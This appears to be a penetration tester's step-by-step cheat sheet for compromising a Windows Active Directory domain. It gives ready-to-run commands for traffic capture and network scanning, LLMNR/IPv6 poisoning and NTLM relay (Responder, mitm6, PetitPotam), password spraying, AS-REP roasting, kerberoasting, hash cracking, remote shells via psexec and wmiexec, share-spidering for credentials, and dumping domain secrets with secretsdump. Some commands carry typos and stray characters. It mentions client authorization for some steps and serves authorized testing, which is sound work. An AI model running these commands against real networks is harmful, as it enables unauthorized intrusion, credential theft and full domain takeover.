Pen Test Workflow

  1. Recon the environment
    1. Dump Traffic
    2. Identify the Domain and the Domain Controllers
    3. Nmap
  2. Checking Protocols/Ports/Services
    1. DNS (Port 53)
      1. Zone Transfer
    2. SNMP (Ports 161,162,10161,10162)
  3. Get a username and password
    1. Relay/Poisoning
      1. Listen passively with responder
      2. Responder with SMB relay
      3. mitm6
      4. PetitPotam
    2. kerbrute
    3. enum4linux (User List)
    4. ASREPRoast
  4. Cracking Hashes
    1. LM/NTLM/Kerberos 5 TGS
  5. Find a path to Domain Admin
    1. Bloodhound-Python
    2. kerberoasting
  6. Enumerate Environment
    1. SMB (Ports 139,445)
      1. SMB Client
      2. Crackmap Exec (CME)
    2. Shell a Windows Machine
    3. manspider
    4. Nmap/ldapdomaindump/masscan/eyewitness
  7. Domain Admin Creds
    1. secretsdump

Recon the environment

Unless there is a big time crunch, take some time to familiarize yourself with the environment that you are in. What is your IP address? Where are the DC’s, File servers, Mail servers, SQL servers? What is their naming schema like? Build a map and use it to help focus your efforts on the seemingly weakest points.

Dump Traffic

The first command will dump all traffic to a .pcap which can be analyzed locally. Run it in the morning, afternoon and evening. The second command will dump all UDP traffic

tshark -c 25000 -w morning.pcap

tcpdump -i <INTERFACE> -w <OUTFILE> -C 50000000 -W 10 not ether host <LOCAL_MAC_ADDR> and not host <RNA_IP>

Examine and look for insecure protocols (telnet, http) and IPv6 traffic (for mitm6).

Identify the Domain and the Domain Controllers

Once you find them make a domain_dcs.txt file

cat /etc/resolv.conf 2nslookup -type=srv _ldap._tcp.dc._msdcs.//<DOMAIN>/

nmcli dev show eth0

Nmap

Start with the subnet of your current host, then the subnet of a DC. If you have an IP of a workstation it would be a good idea to check there as well. I will also individually scan a good sample of hosts that were discovered with CME, ldapdomaindump, etc. When discovering specific ports that are open, run script scans for easy to pop vulnerabilities. 

nmap -PN -sV --top-ports 50 --open <IP> -oA <IP>_quick_scan 
nmap -PN -sC -sV <IP> -oA <IP>_regular_scan 
nmap -PN -sC -sV -p- <IP> -oA <IP>_deep_scan 
nmap -p 25,2525 --script smtp-open-relay <IP> -v 
nmap -p 139,445 --script-smb-vuln* <IP> 
namp -p 389 -n -sV --script "ldap* and not brute" <DC IP> 
nmap -p 161 --script "snmp* and not snmp-brute" <target>

Checking Protocols/Ports/Services

DNS (Port 53)

Zone Transfer

dnsrecon -d <domain.com> -t axfr -j </path/to/output/zone_transfer.json>

SNMP (Ports 161,162,10161,10162)

snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] . 

snmpbulkwalk -c public -v2c 10.10.11.136 . 

snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] 

snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] 1.3.6.1.2.1.4.34.1.3 

snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] NET-SNMP-EXTEND-MIB::nsExtendObjects 

snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] .1

Get a username and password

Generate a list of possible usernames with OSINT etc.

Some of these commands utilize password spraying. First verify with the client that this is authorized, and provide a list of accounts you are going to spray. Spray accounts ~8 hours apart to prevent any lockouts

Relay/Poisoning

Listen passively with responder

responder -i eth0 -A

Responder with SMB relay

Find hosts with no SMB signing. In responder.conf set:

  • SMB = Off
  • HTTP = Off

crackmapexec smb <Subnet or ips.txt> –gen-relay-list relay.txt 2resoponder -i eth0 -dwv

In a second terminal 1impacket-ntlmrelay -tf relaylist.txt -smb2support

mitm6

Requires Client Authorization, can cause interruptions

mitm6 -i eth0 --ignore-nofqdn -wh <domainName>

impacket-ntlmrelayx -6 -t ldaps://<IP of DC> -wh <fwpad.domainName> --delegate-access -smb2support

PetitPotam

PetitPotam/PetitPotam.py at main · topotam/PetitPotam 

1PetitPotam.py -d <domain> <listener_ip> <target_ip>

kerbrute

Bruteforce usernames with a good list, password spray with seasonal passwords

./kerbrute_linux_amd64 userenum -d <DOMAIN> usernames.txt

./kerbrute_linux_amd64 passwordspray -d <DOMAIN> domain_users.txt Winter2022

enum4linux (User List)

enum4linux -U | grep ‘user:’

ASREPRoast

Requires a user list

impacket-GetNPUsers <domain>/ -usersfile <usernames.txt> -format hashcat -outputfile <hashes.domain.txt>

Cracking Hashes

LM/NTLM/Kerberos 5 TGS

hashcat -m 3000 -a 3 hash.txt

hashcat -m 1000 -a 3 hash.txt

hashcat -m 13100 kerbHashes.txt <wordlist location>

Find a path to Domain Admin

Bloodhound-Python

Installing Bloodhound:Linux — BloodHound 4.2.0 documentation

Export this data and view in bloodhound

bloodhound-python -d <DOMAIN> -u <USER> -p <PASSWORD> -gc <DC.DOMAIN.LOCAL> -c all

Take the output files and drop directly into bloodhound

kerberoasting

impacket-GetUserSPNs -outputfile kerbHashes.txt -dc-ip <ip> ‘domain/user:password’

impacket-GetUserSPNs -outputfile kerbHashes.txt -hashes ‘LMhash:NThash' -dc-ip <ip> ‘domain/user’

crackmapexec ldap <ip> -u <user> -p 'password' --kerberoasting kerbHashes.txt --kdcHost <ip>

Enumerate Environment

Try to get a username/password before proceeding

Take some time here to look at the information you have gathered. Look through any files you were able to obtain. Look at ldapdomain dump description fields for passwords.

SMB (Ports 139,445)

SMB Client

smbclient -U '<USER>' \\\\<IP>\\<SHARE>

smbclient -U '%' -N \\\\<IP>\\<SHARE>

smbclient --no-pass -L //<IP>

impacket-smbclient [[domain/]username[:password]@]<targetName or address>

Crackmap Exec (CME)

CME can be used to enumerate hosts/users, check for SMB signing, look for shares, and check password policies, check for ones with guest access if no creds.

cme smb <IP Range>

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares

crackmapexec <IP> -u 'user' -p 'password' --pass-pol

Shell a Windows Machine

impacket-psexec <DOMAIN.LOCAL/USER:PASSWORD@IP_ADDRESS>

impacket-wmiexec <DOMAIN.LOCAL/USER:PASSWORD@IP_ADDRESS>

manspider

Spider shares and look for sensitive info

sudo apt install tesseract-ocr

pip install pipx

pipx install git+https://github.com/blacklanternsecurity/MANSPIDER

manspider 192.168.0.0/24 -f passw user admin account network login logon cred -d <DOMAIN> -u <USER> -p <PASSWORD>

manspider <SERVER_NAME>.<DOMAIN>.local -c password -e xlsx -d <DOMAIN> -u <USER> -p <PASSWORD>

manspider share.<DOMAIN>.local -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config -d <DOMAIN> -u <USER> -p <PASSWORD>

manspider share.<DOMAIN>.local --dirnames bank financ payable payment reconcil remit voucher vendor eft swift -f '[0-9]{5,}' -d <DOMAIN> -u <USER> -p <PASSWORD>

Nmap/ldapdomaindump/masscan/eyewitness

Use ldapDomainDump data to build out a list of hosts, resolve the hosts to ip’s, run masscan on those ip’s, run nmap on those ip’s, then run eyewitness on those ip’s!

ldapdomaindump -u domain\\USER -p 'PASSWORD' --grouped-json -o /home/USER/ldapdomaindump <DC-IP> 

cd /home/USER/ldapdomaindump 

for line in $(cat domain_computers.grep | cut -d $'\t' -f 3); do dig +short "$line" >> ips.txt; done 

masscan -p 80,443,8080,8000,8008,9000,8443,591 -iL ips.txt | tee -a web_ips.txt 

awk '{print$4}' web_ips.txt | sort | uniq | > web_ips_for_nmap.txt

nmap -p 80,443,8080,8000,8008,9000,8443,591 -iL web_ips_for_nmap.txt -oA web_ips_for_eyewitness 

eyewitness -x web_ips_for_eyewitness.xml

Domain Admin Creds

secretsdump

secretsdump.py '<DOMAIN>/<USER>:<PASS>'@<DC_IP>